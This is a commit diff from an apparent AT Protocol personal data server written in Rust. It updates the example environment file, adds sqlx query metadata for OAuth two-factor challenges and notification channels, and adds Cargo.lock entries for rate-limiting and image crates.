this repo has no description

Remaining endpoints for MVP

lewis 778c4a67 b25a102f

Changed files
+8803 -564
.sqlx
migrations
src
tests
+9 -8
.env.example
··· 13 PDS_HOSTNAME=localhost:3000 14 PLC_URL=plc.directory 15 16 - # A comma-separated list of WebSocket URLs for firehose relays to push updates to. 17 - # e.g., RELAYS=wss://relay.bsky.social,wss://another-relay.com 18 - RELAYS= 19 20 # Notification Service Configuration 21 # At least one notification channel should be configured for user notifications to work. 22 # Email notifications (via sendmail/msmtp) 23 # MAIL_FROM_ADDRESS=noreply@example.com 24 # MAIL_FROM_NAME=My PDS 25 # SENDMAIL_PATH=/usr/sbin/sendmail 26 27 - # Discord notifications (not yet implemented) 28 - # DISCORD_BOT_TOKEN=your-bot-token 29 30 - # Telegram notifications (not yet implemented) 31 # TELEGRAM_BOT_TOKEN=your-bot-token 32 33 - # Signal notifications (not yet implemented) 34 # SIGNAL_CLI_PATH=/usr/local/bin/signal-cli 35 - # SIGNAL_PHONE_NUMBER=+1234567890 36 37 CARGO_MOMMYS_LITTLE=mister 38 CARGO_MOMMYS_PRONOUNS=his
··· 13 PDS_HOSTNAME=localhost:3000 14 PLC_URL=plc.directory 15 16 + # A comma-separated list of relay URLs to notify via requestCrawl when we have updates. 17 + # e.g., CRAWLERS=https://bsky.network 18 + CRAWLERS= 19 20 # Notification Service Configuration 21 # At least one notification channel should be configured for user notifications to work. 22 + 23 # Email notifications (via sendmail/msmtp) 24 # MAIL_FROM_ADDRESS=noreply@example.com 25 # MAIL_FROM_NAME=My PDS 26 # SENDMAIL_PATH=/usr/sbin/sendmail 27 28 + # Discord notifications (via webhook) 29 + # DISCORD_WEBHOOK_URL=https://discord.com/api/webhooks/... 30 31 + # Telegram notifications (via bot) 32 # TELEGRAM_BOT_TOKEN=your-bot-token 33 34 + # Signal notifications (via signal-cli) 35 # SIGNAL_CLI_PATH=/usr/local/bin/signal-cli 36 + # SIGNAL_SENDER_NUMBER=+1234567890 37 38 CARGO_MOMMYS_LITTLE=mister 39 CARGO_MOMMYS_PRONOUNS=his
+34
.sqlx/query-0cbeeffaf2cf782de4e9d886e26b9884e874735e76b50c42933a94d9fa70425e.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "SELECT preferred_notification_channel as \"channel: NotificationChannel\" FROM users WHERE did = $1", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "channel: NotificationChannel", 9 + "type_info": { 10 + "Custom": { 11 + "name": "notification_channel", 12 + "kind": { 13 + "Enum": [ 14 + "email", 15 + "discord", 16 + "telegram", 17 + "signal" 18 + ] 19 + } 20 + } 21 + } 22 + } 23 + ], 24 + "parameters": { 25 + "Left": [ 26 + "Text" 27 + ] 28 + }, 29 + "nullable": [ 30 + false 31 + ] 32 + }, 33 + "hash": "0cbeeffaf2cf782de4e9d886e26b9884e874735e76b50c42933a94d9fa70425e" 34 + }
+61
.sqlx/query-0d59bd89c410dfceaa7eabcd028415c8f3218755a4cd1730d5f800057b9b369f.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n INSERT INTO oauth_2fa_challenge (did, request_uri, code, expires_at)\n VALUES ($1, $2, $3, $4)\n RETURNING id, did, request_uri, code, attempts, created_at, expires_at\n ", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "id", 9 + "type_info": "Uuid" 10 + }, 11 + { 12 + "ordinal": 1, 13 + "name": "did", 14 + "type_info": "Text" 15 + }, 16 + { 17 + "ordinal": 2, 18 + "name": "request_uri", 19 + "type_info": "Text" 20 + }, 21 + { 22 + "ordinal": 3, 23 + "name": "code", 24 + "type_info": "Text" 25 + }, 26 + { 27 + "ordinal": 4, 28 + "name": "attempts", 29 + "type_info": "Int4" 30 + }, 31 + { 32 + "ordinal": 5, 33 + "name": "created_at", 34 + "type_info": "Timestamptz" 35 + }, 36 + { 37 + "ordinal": 6, 38 + "name": "expires_at", 39 + "type_info": "Timestamptz" 40 + } 41 + ], 42 + "parameters": { 43 + "Left": [ 44 + "Text", 45 + "Text", 46 + "Text", 47 + "Timestamptz" 48 + ] 49 + }, 50 + "nullable": [ 51 + false, 52 + false, 53 + false, 54 + false, 55 + false, 56 + false, 57 + false 58 + ] 59 + }, 60 + "hash": "0d59bd89c410dfceaa7eabcd028415c8f3218755a4cd1730d5f800057b9b369f" 61 + }
+22
.sqlx/query-180e9287d4e7f0d2b074518aa3ae2c1ab276e486b4c2ebaaac299fa77414ef09.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n SELECT two_factor_enabled\n FROM users\n WHERE did = $1\n ", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "two_factor_enabled", 9 + "type_info": "Bool" 10 + } 11 + ], 12 + "parameters": { 13 + "Left": [ 14 + "Text" 15 + ] 16 + }, 17 + "nullable": [ 18 + false 19 + ] 20 + }, 21 + "hash": "180e9287d4e7f0d2b074518aa3ae2c1ab276e486b4c2ebaaac299fa77414ef09" 22 + }
-30
.sqlx/query-243ff4911a7d36354e60005af13f6c7d854dc48b8c0d3674f3cbdfd60b61c9d1.json
··· 1 - { 2 - "db_name": "PostgreSQL", 3 - "query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey ASC LIMIT $3", 4 - "describe": { 5 - "columns": [ 6 - { 7 - "ordinal": 0, 8 - "name": "rkey", 9 - "type_info": "Text" 10 - }, 11 - { 12 - "ordinal": 1, 13 - "name": "record_cid", 14 - "type_info": "Text" 15 - } 16 - ], 17 - "parameters": { 18 - "Left": [ 19 - "Uuid", 20 - "Text", 21 - "Int8" 22 - ] 23 - }, 24 - "nullable": [ 25 - false, 26 - false 27 - ] 28 - }, 29 - "hash": "243ff4911a7d36354e60005af13f6c7d854dc48b8c0d3674f3cbdfd60b61c9d1" 30 - }
···
-30
.sqlx/query-2d37a447ec4dbdb6dfd5ab8c12d1ce88b9be04d6c7b4744891352a9a3bed4f3c.json
··· 1 - { 2 - "db_name": "PostgreSQL", 3 - "query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey DESC LIMIT $3", 4 - "describe": { 5 - "columns": [ 6 - { 7 - "ordinal": 0, 8 - "name": "rkey", 9 - "type_info": "Text" 10 - }, 11 - { 12 - "ordinal": 1, 13 - "name": "record_cid", 14 - "type_info": "Text" 15 - } 16 - ], 17 - "parameters": { 18 - "Left": [ 19 - "Uuid", 20 - "Text", 21 - "Int8" 22 - ] 23 - }, 24 - "nullable": [ 25 - false, 26 - false 27 - ] 28 - }, 29 - "hash": "2d37a447ec4dbdb6dfd5ab8c12d1ce88b9be04d6c7b4744891352a9a3bed4f3c" 30 - }
···
+2 -1
.sqlx/query-303777d97e6ed344f8c699eae37b7b0c241c734a5b7726019c2a59ae277caee6.json
··· 36 "email_update", 37 "account_deletion", 38 "admin_email", 39 - "plc_operation" 40 ] 41 } 42 }
··· 36 "email_update", 37 "account_deletion", 38 "admin_email", 39 + "plc_operation", 40 + "two_factor_code" 41 ] 42 } 43 }
-31
.sqlx/query-347e3570a201ee339904aab43f0519ff631f160c97453e9e8aef04756cbc424e.json
··· 1 - { 2 - "db_name": "PostgreSQL", 3 - "query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey > $3 ORDER BY rkey ASC LIMIT $4", 4 - "describe": { 5 - "columns": [ 6 - { 7 - "ordinal": 0, 8 - "name": "rkey", 9 - "type_info": "Text" 10 - }, 11 - { 12 - "ordinal": 1, 13 - "name": "record_cid", 14 - "type_info": "Text" 15 - } 16 - ], 17 - "parameters": { 18 - "Left": [ 19 - "Uuid", 20 - "Text", 21 - "Text", 22 - "Int8" 23 - ] 24 - }, 25 - "nullable": [ 26 - false, 27 - false 28 - ] 29 - }, 30 - "hash": "347e3570a201ee339904aab43f0519ff631f160c97453e9e8aef04756cbc424e" 31 - }
···
-31
.sqlx/query-4343e751b03e24387f6603908a1582d20fdfa58a8e4c17c1628acc6b6f2ded15.json
··· 1 - { 2 - "db_name": "PostgreSQL", 3 - "query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey < $3 ORDER BY rkey DESC LIMIT $4", 4 - "describe": { 5 - "columns": [ 6 - { 7 - "ordinal": 0, 8 - "name": "rkey", 9 - "type_info": "Text" 10 - }, 11 - { 12 - "ordinal": 1, 13 - "name": "record_cid", 14 - "type_info": "Text" 15 - } 16 - ], 17 - "parameters": { 18 - "Left": [ 19 - "Uuid", 20 - "Text", 21 - "Text", 22 - "Int8" 23 - ] 24 - }, 25 - "nullable": [ 26 - false, 27 - false 28 - ] 29 - }, 30 - "hash": "4343e751b03e24387f6603908a1582d20fdfa58a8e4c17c1628acc6b6f2ded15" 31 - }
···
+76
.sqlx/query-458c98edc9c01286dc2677fcff82c1f84c5db138fdef9a8e8756771c30b66810.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n SELECT id, did, email, password_hash, two_factor_enabled,\n preferred_notification_channel as \"preferred_notification_channel: NotificationChannel\",\n deactivated_at, takedown_ref\n FROM users\n WHERE handle = $1 OR email = $1\n ", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "id", 9 + "type_info": "Uuid" 10 + }, 11 + { 12 + "ordinal": 1, 13 + "name": "did", 14 + "type_info": "Text" 15 + }, 16 + { 17 + "ordinal": 2, 18 + "name": "email", 19 + "type_info": "Text" 20 + }, 21 + { 22 + "ordinal": 3, 23 + "name": "password_hash", 24 + "type_info": "Text" 25 + }, 26 + { 27 + "ordinal": 4, 28 + "name": "two_factor_enabled", 29 + "type_info": "Bool" 30 + }, 31 + { 32 + "ordinal": 5, 33 + "name": "preferred_notification_channel: NotificationChannel", 34 + "type_info": { 35 + "Custom": { 36 + "name": "notification_channel", 37 + "kind": { 38 + "Enum": [ 39 + "email", 40 + "discord", 41 + "telegram", 42 + "signal" 43 + ] 44 + } 45 + } 46 + } 47 + }, 48 + { 49 + "ordinal": 6, 50 + "name": "deactivated_at", 51 + "type_info": "Timestamptz" 52 + }, 53 + { 54 + "ordinal": 7, 55 + "name": "takedown_ref", 56 + "type_info": "Text" 57 + } 58 + ], 59 + "parameters": { 60 + "Left": [ 61 + "Text" 62 + ] 63 + }, 64 + "nullable": [ 65 + false, 66 + false, 67 + false, 68 + false, 69 + false, 70 + false, 71 + true, 72 + true 73 + ] 74 + }, 75 + "hash": "458c98edc9c01286dc2677fcff82c1f84c5db138fdef9a8e8756771c30b66810" 76 + }
+22
.sqlx/query-4d52c04129df85efcab747dfd38dc7b5fbd46d8b83c753319cba264ecf6d7df6.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n UPDATE oauth_2fa_challenge\n SET attempts = attempts + 1\n WHERE id = $1\n RETURNING attempts\n ", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "attempts", 9 + "type_info": "Int4" 10 + } 11 + ], 12 + "parameters": { 13 + "Left": [ 14 + "Uuid" 15 + ] 16 + }, 17 + "nullable": [ 18 + false 19 + ] 20 + }, 21 + "hash": "4d52c04129df85efcab747dfd38dc7b5fbd46d8b83c753319cba264ecf6d7df6" 22 + }
+2 -1
.sqlx/query-5d49bbf0307a0c642b0174d641de748fa648c97f8109255120e969c957ff95bf.json
··· 36 "email_update", 37 "account_deletion", 38 "admin_email", 39 - "plc_operation" 40 ] 41 } 42 }
··· 36 "email_update", 37 "account_deletion", 38 "admin_email", 39 + "plc_operation", 40 + "two_factor_code" 41 ] 42 } 43 }
+46
.sqlx/query-62f66fad54498d5c598af54de795e395f71596a6d6a88d2be64ce86256a9860f.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n SELECT id, two_factor_enabled,\n preferred_notification_channel as \"preferred_notification_channel: NotificationChannel\"\n FROM users\n WHERE did = $1\n ", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "id", 9 + "type_info": "Uuid" 10 + }, 11 + { 12 + "ordinal": 1, 13 + "name": "two_factor_enabled", 14 + "type_info": "Bool" 15 + }, 16 + { 17 + "ordinal": 2, 18 + "name": "preferred_notification_channel: NotificationChannel", 19 + "type_info": { 20 + "Custom": { 21 + "name": "notification_channel", 22 + "kind": { 23 + "Enum": [ 24 + "email", 25 + "discord", 26 + "telegram", 27 + "signal" 28 + ] 29 + } 30 + } 31 + } 32 + } 33 + ], 34 + "parameters": { 35 + "Left": [ 36 + "Text" 37 + ] 38 + }, 39 + "nullable": [ 40 + false, 41 + false, 42 + false 43 + ] 44 + }, 45 + "hash": "62f66fad54498d5c598af54de795e395f71596a6d6a88d2be64ce86256a9860f" 46 + }
+14
.sqlx/query-6be6cd9d43002aa9e2bd337e26228771d527d4a683f4a273248e9cd91fdfd7a4.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n DELETE FROM oauth_2fa_challenge WHERE request_uri = $1\n ", 4 + "describe": { 5 + "columns": [], 6 + "parameters": { 7 + "Left": [ 8 + "Text" 9 + ] 10 + }, 11 + "nullable": [] 12 + }, 13 + "hash": "6be6cd9d43002aa9e2bd337e26228771d527d4a683f4a273248e9cd91fdfd7a4" 14 + }
+14
.sqlx/query-7d1246fb9125ebdfa6d4896942411ea0d6766d6a8840ae2b0589c42c0de79fc5.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n DELETE FROM oauth_2fa_challenge WHERE id = $1\n ", 4 + "describe": { 5 + "columns": [], 6 + "parameters": { 7 + "Left": [ 8 + "Uuid" 9 + ] 10 + }, 11 + "nullable": [] 12 + }, 13 + "hash": "7d1246fb9125ebdfa6d4896942411ea0d6766d6a8840ae2b0589c42c0de79fc5" 14 + }
+40
.sqlx/query-841452a9e325ea5f4ae3bff00cd77c98667913225305df559559e36110516cfb.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n SELECT u.did, u.handle, u.email, ad.updated_at as last_used_at\n FROM oauth_account_device ad\n JOIN users u ON u.did = ad.did\n WHERE ad.device_id = $1\n AND u.deactivated_at IS NULL\n AND u.takedown_ref IS NULL\n ORDER BY ad.updated_at DESC\n ", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "did", 9 + "type_info": "Text" 10 + }, 11 + { 12 + "ordinal": 1, 13 + "name": "handle", 14 + "type_info": "Text" 15 + }, 16 + { 17 + "ordinal": 2, 18 + "name": "email", 19 + "type_info": "Text" 20 + }, 21 + { 22 + "ordinal": 3, 23 + "name": "last_used_at", 24 + "type_info": "Timestamptz" 25 + } 26 + ], 27 + "parameters": { 28 + "Left": [ 29 + "Text" 30 + ] 31 + }, 32 + "nullable": [ 33 + false, 34 + false, 35 + false, 36 + false 37 + ] 38 + }, 39 + "hash": "841452a9e325ea5f4ae3bff00cd77c98667913225305df559559e36110516cfb" 40 + }
+58
.sqlx/query-881b03f9f19aba8f65feaab97570d27c1afd00181ce495a5903a47fbfe243708.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n SELECT id, did, request_uri, code, attempts, created_at, expires_at\n FROM oauth_2fa_challenge\n WHERE request_uri = $1\n ", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "id", 9 + "type_info": "Uuid" 10 + }, 11 + { 12 + "ordinal": 1, 13 + "name": "did", 14 + "type_info": "Text" 15 + }, 16 + { 17 + "ordinal": 2, 18 + "name": "request_uri", 19 + "type_info": "Text" 20 + }, 21 + { 22 + "ordinal": 3, 23 + "name": "code", 24 + "type_info": "Text" 25 + }, 26 + { 27 + "ordinal": 4, 28 + "name": "attempts", 29 + "type_info": "Int4" 30 + }, 31 + { 32 + "ordinal": 5, 33 + "name": "created_at", 34 + "type_info": "Timestamptz" 35 + }, 36 + { 37 + "ordinal": 6, 38 + "name": "expires_at", 39 + "type_info": "Timestamptz" 40 + } 41 + ], 42 + "parameters": { 43 + "Left": [ 44 + "Text" 45 + ] 46 + }, 47 + "nullable": [ 48 + false, 49 + false, 50 + false, 51 + false, 52 + false, 53 + false, 54 + false 55 + ] 56 + }, 57 + "hash": "881b03f9f19aba8f65feaab97570d27c1afd00181ce495a5903a47fbfe243708" 58 + }
-40
.sqlx/query-91ab872f41891370baf9d405e8812b8d4cfb0b7555430eb45f16fe550fac4b43.json
··· 1 - { 2 - "db_name": "PostgreSQL", 3 - "query": "\n SELECT did, password_hash, deactivated_at, takedown_ref\n FROM users\n WHERE handle = $1 OR email = $1\n ", 4 - "describe": { 5 - "columns": [ 6 - { 7 - "ordinal": 0, 8 - "name": "did", 9 - "type_info": "Text" 10 - }, 11 - { 12 - "ordinal": 1, 13 - "name": "password_hash", 14 - "type_info": "Text" 15 - }, 16 - { 17 - "ordinal": 2, 18 - "name": "deactivated_at", 19 - "type_info": "Timestamptz" 20 - }, 21 - { 22 - "ordinal": 3, 23 - "name": "takedown_ref", 24 - "type_info": "Text" 25 - } 26 - ], 27 - "parameters": { 28 - "Left": [ 29 - "Text" 30 - ] 31 - }, 32 - "nullable": [ 33 - false, 34 - false, 35 - true, 36 - true 37 - ] 38 - }, 39 - "hash": "91ab872f41891370baf9d405e8812b8d4cfb0b7555430eb45f16fe550fac4b43" 40 - }
···
+23
.sqlx/query-a32e91d22d66deba7b9bfae2c965d17c3074c0eea7c2bf5b1f2ea07ba61eeb3b.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n SELECT 1 as exists\n FROM oauth_account_device ad\n JOIN users u ON u.did = ad.did\n WHERE ad.device_id = $1\n AND ad.did = $2\n AND u.deactivated_at IS NULL\n AND u.takedown_ref IS NULL\n ", 4 + "describe": { 5 + "columns": [ 6 + { 7 + "ordinal": 0, 8 + "name": "exists", 9 + "type_info": "Int4" 10 + } 11 + ], 12 + "parameters": { 13 + "Left": [ 14 + "Text", 15 + "Text" 16 + ] 17 + }, 18 + "nullable": [ 19 + null 20 + ] 21 + }, 22 + "hash": "a32e91d22d66deba7b9bfae2c965d17c3074c0eea7c2bf5b1f2ea07ba61eeb3b" 23 + }
+12
.sqlx/query-bc31134e6927444993555d2f2d56bc0f5e42d3511f9daa00a0bb677ce48072ac.json
···
··· 1 + { 2 + "db_name": "PostgreSQL", 3 + "query": "\n DELETE FROM oauth_2fa_challenge WHERE expires_at < NOW()\n ", 4 + "describe": { 5 + "columns": [], 6 + "parameters": { 7 + "Left": [] 8 + }, 9 + "nullable": [] 10 + }, 11 + "hash": "bc31134e6927444993555d2f2d56bc0f5e42d3511f9daa00a0bb677ce48072ac" 12 + }
+2 -1
.sqlx/query-cb6f48aaba124c79308d20e66c23adb44d1196296b7f93fad19b2d17548ed3de.json
··· 44 "email_update", 45 "account_deletion", 46 "admin_email", 47 - "plc_operation" 48 ] 49 } 50 }
··· 44 "email_update", 45 "account_deletion", 46 "admin_email", 47 + "plc_operation", 48 + "two_factor_code" 49 ] 50 } 51 }
+206 -1
Cargo.lock
··· 915 "dotenvy", 916 "ed25519-dalek", 917 "futures", 918 "hkdf", 919 "hmac", 920 "ipld-core", 921 "iroh-car", 922 "jacquard", ··· 986 checksum = "175812e0be2bccb6abe50bb8d566126198344f707e304f45c648fd8f2cc0365e" 987 988 [[package]] 989 name = "byteorder" 990 version = "1.5.0" 991 source = "registry+https://github.com/rust-lang/crates.io-index" 992 checksum = "1fd0f2584146f6f2ef48085050886acf353beff7305ebd1ae69500e27c67f64b" 993 994 [[package]] 995 name = "bytes" ··· 1156 dependencies = [ 1157 "cc", 1158 ] 1159 1160 [[package]] 1161 name = "compression-codecs" ··· 1820 checksum = "37909eebbb50d72f9059c3b6d82c0463f2ff062c9e95845c43a6c9c0355411be" 1821 1822 [[package]] 1823 name = "ferroid" 1824 version = "0.8.7" 1825 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 1906 version = "0.1.5" 1907 source = "registry+https://github.com/rust-lang/crates.io-index" 1908 checksum = "d9c4f5dac5e15c24eb999c26181a6ca40b39fe946cbe4c263c7209467bc83af2" 1909 1910 [[package]] 1911 name = "foreign-types" ··· 2056 checksum = "f90f7dce0722e95104fcb095585910c0977252f286e354b5e3bd38902cd99988" 2057 2058 [[package]] 2059 name = "futures-util" 2060 version = "0.3.31" 2061 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 2136 ] 2137 2138 [[package]] 2139 name = "glob" 2140 version = "0.3.3" 2141 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 2170 ] 2171 2172 [[package]] 2173 name = "group" 2174 version = "0.12.1" 2175 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 2260 dependencies = [ 2261 "allocator-api2", 2262 "equivalent", 2263 - "foldhash", 2264 ] 2265 2266 [[package]] ··· 2268 version = "0.16.1" 2269 source = "registry+https://github.com/rust-lang/crates.io-index" 2270 checksum = "841d1cc9bed7f9236f321df977030373f4a4163ae1a7dbfe1a51a2c1a51d9100" 2271 2272 [[package]] 2273 name = "hashlink" ··· 2760 ] 2761 2762 [[package]] 2763 name = "indexmap" 2764 version = "1.9.3" 2765 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 3477 ] 3478 3479 [[package]] 3480 name = "multibase" 3481 version = "0.9.2" 3482 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 3552 "memchr", 3553 "minimal-lexical", 3554 ] 3555 3556 [[package]] 3557 name = "nu-ansi-term" ··· 3976 checksum = "7edddbd0b52d732b21ad9a5fab5c704c14cd949e5e9a1ec5929a24fded1b904c" 3977 3978 [[package]] 3979 name = "polyval" 3980 version = "0.6.2" 3981 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 4132 ] 4133 4134 [[package]] 4135 name = "quinn" 4136 version = "0.11.9" 4137 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 4265 version = "0.3.2" 4266 source = "registry+https://github.com/rust-lang/crates.io-index" 4267 checksum = "d20581732dd76fa913c7dff1a2412b714afe3573e94d41c34719de73337cc8ab" 4268 4269 [[package]] 4270 name = "redox_syscall" ··· 5034 checksum = "d5fe4ccb98d9c292d56fec89a5e07da7fc4cf0dc11e156b41793132775d3e591" 5035 5036 [[package]] 5037 name = "spki" 5038 version = "0.6.0" 5039 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 6221 ] 6222 6223 [[package]] 6224 name = "whoami" 6225 version = "1.6.1" 6226 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 6831 "quote", 6832 "syn 2.0.111", 6833 ]
··· 915 "dotenvy", 916 "ed25519-dalek", 917 "futures", 918 + "governor", 919 "hkdf", 920 "hmac", 921 + "image", 922 "ipld-core", 923 "iroh-car", 924 "jacquard", ··· 988 checksum = "175812e0be2bccb6abe50bb8d566126198344f707e304f45c648fd8f2cc0365e" 989 990 [[package]] 991 + name = "bytemuck" 992 + version = "1.24.0" 993 + source = "registry+https://github.com/rust-lang/crates.io-index" 994 + checksum = "1fbdf580320f38b612e485521afda1ee26d10cc9884efaaa750d383e13e3c5f4" 995 + 996 + [[package]] 997 name = "byteorder" 998 version = "1.5.0" 999 source = "registry+https://github.com/rust-lang/crates.io-index" 1000 checksum = "1fd0f2584146f6f2ef48085050886acf353beff7305ebd1ae69500e27c67f64b" 1001 + 1002 + [[package]] 1003 + name = "byteorder-lite" 1004 + version = "0.1.0" 1005 + source = "registry+https://github.com/rust-lang/crates.io-index" 1006 + checksum = "8f1fe948ff07f4bd06c30984e69f5b4899c516a3ef74f34df92a2df2ab535495" 1007 1008 [[package]] 1009 name = "bytes" ··· 1170 dependencies = [ 1171 "cc", 1172 ] 1173 + 1174 + [[package]] 1175 + name = "color_quant" 1176 + version = "1.1.0" 1177 + source = "registry+https://github.com/rust-lang/crates.io-index" 1178 + checksum = "3d7b894f5411737b7867f4827955924d7c254fc9f4d91a6aad6b097804b1018b" 1179 1180 [[package]] 1181 name = "compression-codecs" ··· 1840 checksum = "37909eebbb50d72f9059c3b6d82c0463f2ff062c9e95845c43a6c9c0355411be" 1841 1842 [[package]] 1843 + name = "fdeflate" 1844 + version = "0.3.7" 1845 + source = "registry+https://github.com/rust-lang/crates.io-index" 1846 + checksum = "1e6853b52649d4ac5c0bd02320cddc5ba956bdb407c4b75a2c6b75bf51500f8c" 1847 + dependencies = [ 1848 + "simd-adler32", 1849 + ] 1850 + 1851 + [[package]] 1852 name = "ferroid" 1853 version = "0.8.7" 1854 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 1935 version = "0.1.5" 1936 source = "registry+https://github.com/rust-lang/crates.io-index" 1937 checksum = "d9c4f5dac5e15c24eb999c26181a6ca40b39fe946cbe4c263c7209467bc83af2" 1938 + 1939 + [[package]] 1940 + name = "foldhash" 1941 + version = "0.2.0" 1942 + source = "registry+https://github.com/rust-lang/crates.io-index" 1943 + checksum = "77ce24cb58228fbb8aa041425bb1050850ac19177686ea6e0f41a70416f56fdb" 1944 1945 [[package]] 1946 name = "foreign-types" ··· 2091 checksum = "f90f7dce0722e95104fcb095585910c0977252f286e354b5e3bd38902cd99988" 2092 2093 [[package]] 2094 + name = "futures-timer" 2095 + version = "3.0.3" 2096 + source = "registry+https://github.com/rust-lang/crates.io-index" 2097 + checksum = "f288b0a4f20f9a56b5d1da57e2227c661b7b16168e2f72365f57b63326e29b24" 2098 + 2099 + [[package]] 2100 name = "futures-util" 2101 version = "0.3.31" 2102 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 2177 ] 2178 2179 [[package]] 2180 + name = "gif" 2181 + version = "0.14.1" 2182 + source = "registry+https://github.com/rust-lang/crates.io-index" 2183 + checksum = "f5df2ba84018d80c213569363bdcd0c64e6933c67fe4c1d60ecf822971a3c35e" 2184 + dependencies = [ 2185 + "color_quant", 2186 + "weezl", 2187 + ] 2188 + 2189 + [[package]] 2190 name = "glob" 2191 version = "0.3.3" 2192 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 2221 ] 2222 2223 [[package]] 2224 + name = "governor" 2225 + version = "0.10.2" 2226 + source = "registry+https://github.com/rust-lang/crates.io-index" 2227 + checksum = "6e23d5986fd4364c2fb7498523540618b4b8d92eec6c36a02e565f66748e2f79" 2228 + dependencies = [ 2229 + "cfg-if", 2230 + "dashmap 6.1.0", 2231 + "futures-sink", 2232 + "futures-timer", 2233 + "futures-util", 2234 + "getrandom 0.3.4", 2235 + "hashbrown 0.16.1", 2236 + "nonzero_ext", 2237 + "parking_lot", 2238 + "portable-atomic", 2239 + "quanta", 2240 + "rand 0.9.2", 2241 + "smallvec", 2242 + "spinning_top", 2243 + "web-time", 2244 + ] 2245 + 2246 + [[package]] 2247 name = "group" 2248 version = "0.12.1" 2249 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 2334 dependencies = [ 2335 "allocator-api2", 2336 "equivalent", 2337 + "foldhash 0.1.5", 2338 ] 2339 2340 [[package]] ··· 2342 version = "0.16.1" 2343 source = "registry+https://github.com/rust-lang/crates.io-index" 2344 checksum = "841d1cc9bed7f9236f321df977030373f4a4163ae1a7dbfe1a51a2c1a51d9100" 2345 + dependencies = [ 2346 + "allocator-api2", 2347 + "equivalent", 2348 + "foldhash 0.2.0", 2349 + ] 2350 2351 [[package]] 2352 name = "hashlink" ··· 2839 ] 2840 2841 [[package]] 2842 + name = "image" 2843 + version = "0.25.9" 2844 + source = "registry+https://github.com/rust-lang/crates.io-index" 2845 + checksum = "e6506c6c10786659413faa717ceebcb8f70731c0a60cbae39795fdf114519c1a" 2846 + dependencies = [ 2847 + "bytemuck", 2848 + "byteorder-lite", 2849 + "color_quant", 2850 + "gif", 2851 + "image-webp", 2852 + "moxcms", 2853 + "num-traits", 2854 + "png", 2855 + "zune-core", 2856 + "zune-jpeg", 2857 + ] 2858 + 2859 + [[package]] 2860 + name = "image-webp" 2861 + version = "0.2.4" 2862 + source = "registry+https://github.com/rust-lang/crates.io-index" 2863 + checksum = "525e9ff3e1a4be2fbea1fdf0e98686a6d98b4d8f937e1bf7402245af1909e8c3" 2864 + dependencies = [ 2865 + "byteorder-lite", 2866 + "quick-error", 2867 + ] 2868 + 2869 + [[package]] 2870 name = "indexmap" 2871 version = "1.9.3" 2872 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 3584 ] 3585 3586 [[package]] 3587 + name = "moxcms" 3588 + version = "0.7.10" 3589 + source = "registry+https://github.com/rust-lang/crates.io-index" 3590 + checksum = "80986bbbcf925ebd3be54c26613d861255284584501595cf418320c078945608" 3591 + dependencies = [ 3592 + "num-traits", 3593 + "pxfm", 3594 + ] 3595 + 3596 + [[package]] 3597 name = "multibase" 3598 version = "0.9.2" 3599 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 3669 "memchr", 3670 "minimal-lexical", 3671 ] 3672 + 3673 + [[package]] 3674 + name = "nonzero_ext" 3675 + version = "0.3.0" 3676 + source = "registry+https://github.com/rust-lang/crates.io-index" 3677 + checksum = "38bf9645c8b145698bb0b18a4637dcacbc421ea49bef2317e4fd8065a387cf21" 3678 3679 [[package]] 3680 name = "nu-ansi-term" ··· 4099 checksum = "7edddbd0b52d732b21ad9a5fab5c704c14cd949e5e9a1ec5929a24fded1b904c" 4100 4101 [[package]] 4102 + name = "png" 4103 + version = "0.18.0" 4104 + source = "registry+https://github.com/rust-lang/crates.io-index" 4105 + checksum = "97baced388464909d42d89643fe4361939af9b7ce7a31ee32a168f832a70f2a0" 4106 + dependencies = [ 4107 + "bitflags", 4108 + "crc32fast", 4109 + "fdeflate", 4110 + "flate2", 4111 + "miniz_oxide", 4112 + ] 4113 + 4114 + [[package]] 4115 name = "polyval" 4116 version = "0.6.2" 4117 source = "registry+https://github.com/rust-lang/crates.io-index" ··· 4268 